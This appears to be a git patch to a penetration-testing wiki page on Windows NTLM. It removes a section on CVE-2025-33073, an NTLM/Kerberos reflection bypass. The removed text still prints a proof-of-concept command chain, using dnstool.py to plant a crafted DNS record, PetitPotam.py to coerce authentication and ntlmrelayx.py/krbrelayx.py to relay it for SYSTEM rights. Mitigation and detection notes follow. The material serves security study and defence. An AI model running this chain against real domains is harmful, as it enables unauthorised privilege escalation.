From 4de04c5e35b94e0b6d41f7dceb770722820c204f Mon Sep 17 00:00:00 2001 From: carlospolop Date: Thu, 17 Jul 2025 11:16:55 +0200 Subject: [PATCH] f --- src/windows-hardening/ntlm/README.md | 50 +--------------------------- 1 file changed, 1 insertion(+), 49 deletions(-) diff --git a/src/windows-hardening/ntlm/README.md b/src/windows-hardening/ntlm/README.md index 4326a3f08..0d6841499 100644 --- a/src/windows-hardening/ntlm/README.md +++ b/src/windows-hardening/ntlm/README.md @@ -2,54 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -## NTLM & Kerberos *Reflection* via Serialized SPNs (CVE-2025-33073) - -Windows contains several mitigations that try to prevent *reflection* attacks where an NTLM (or Kerberos) authentication that originates from a host is relayed back to the **same** host to gain SYSTEM privileges. - -Microsoft broke most public chains with MS08-068 (SMB→SMB), MS09-013 (HTTP→SMB), MS15-076 (DCOM→DCOM) and later patches, however **CVE-2025-33073** shows that the protections can still be bypassed by abusing how the **SMB client truncates Service Principal Names (SPNs)** that contain *marshalled* (serialized) target-info. - -### TL;DR of the bug -1. An attacker registers a **DNS A-record** whose label encodes a marshalled SPN – e.g. - `srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA → 10.10.10.50` -2. The victim is coerced to authenticate to that hostname (PetitPotam, DFSCoerce, etc.). -3. When the SMB client passes the target string `cifs/srv11UWhRCAAAAA…` to `lsasrv!LsapCheckMarshalledTargetInfo`, the call to `CredUnmarshalTargetInfo` **strips** the serialized blob, leaving **`cifs/srv1`**. -4. `msv1_0!SspIsTargetLocalhost` (or the Kerberos equivalent) now considers the target to be *localhost* because the short host part matches the computer name (`SRV1`). -5. Consequently, the server sets `NTLMSSP_NEGOTIATE_LOCAL_CALL` and injects **LSASS’ SYSTEM access-token** into the context (for Kerberos a SYSTEM-marked subsession key is created). -6. Relaying that authentication with `ntlmrelayx.py` **or** `krbrelayx.py` gives full SYSTEM rights on the same host. - -### Quick PoC -```bash -# Add malicious DNS record -dnstool.py -u 'DOMAIN\\user' -p 'pass' 10.10.10.1 \ - -a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA \ - -d 10.10.10.50 - -# Trigger authentication -PetitPotam.py -u user -p pass -d DOMAIN \ - srv11UWhRCAAAAAAAAAAAAAAAAA… TARGET.DOMAIN.LOCAL - -# Relay listener (NTLM) -ntlmrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support - -# Relay listener (Kerberos) – remove NTLM mechType first -krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support -``` - -### Patch & Mitigations -* KB patch for **CVE-2025-33073** adds a check in `mrxsmb.sys::SmbCeCreateSrvCall` that blocks any SMB connection whose target contains marshalled info (`CredUnmarshalTargetInfo` ≠ `STATUS_INVALID_PARAMETER`). -* Enforce **SMB signing** to prevent reflection even on unpatched hosts. -* Monitor DNS records resembling `*...*` and block coercion vectors (PetitPotam, DFSCoerce, AuthIP...). - -### Detection ideas -* Network captures with `NTLMSSP_NEGOTIATE_LOCAL_CALL` where client IP ≠ server IP. -* Kerberos AP-REQ containing a subsession key and a client principal equal to the hostname. -* Windows Event 4624/4648 SYSTEM logons immediately followed by remote SMB writes from the same host. - -## References -* [Synacktiv – NTLM Reflection is Dead, Long Live NTLM Reflection!](https://www.synacktiv.com/en/publications/la-reflexion-ntlm-est-morte-vive-la-reflexion-ntlm-analyse-approfondie-de-la-cve-2025.html) -* [MSRC – CVE-2025-33073](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073) - - ## Basic Information @@ -338,7 +290,7 @@ The PoC can be found in **[https://github.com/eladshamir/Internal-Monologue](htt **Read more detailed guide on how to perform those attacks here:** {{#ref}} -../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +../../generic-methodologies-and-resources/pentesting-network/`spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md` {{#endref}} ## Parse NTLM challenges from a network capture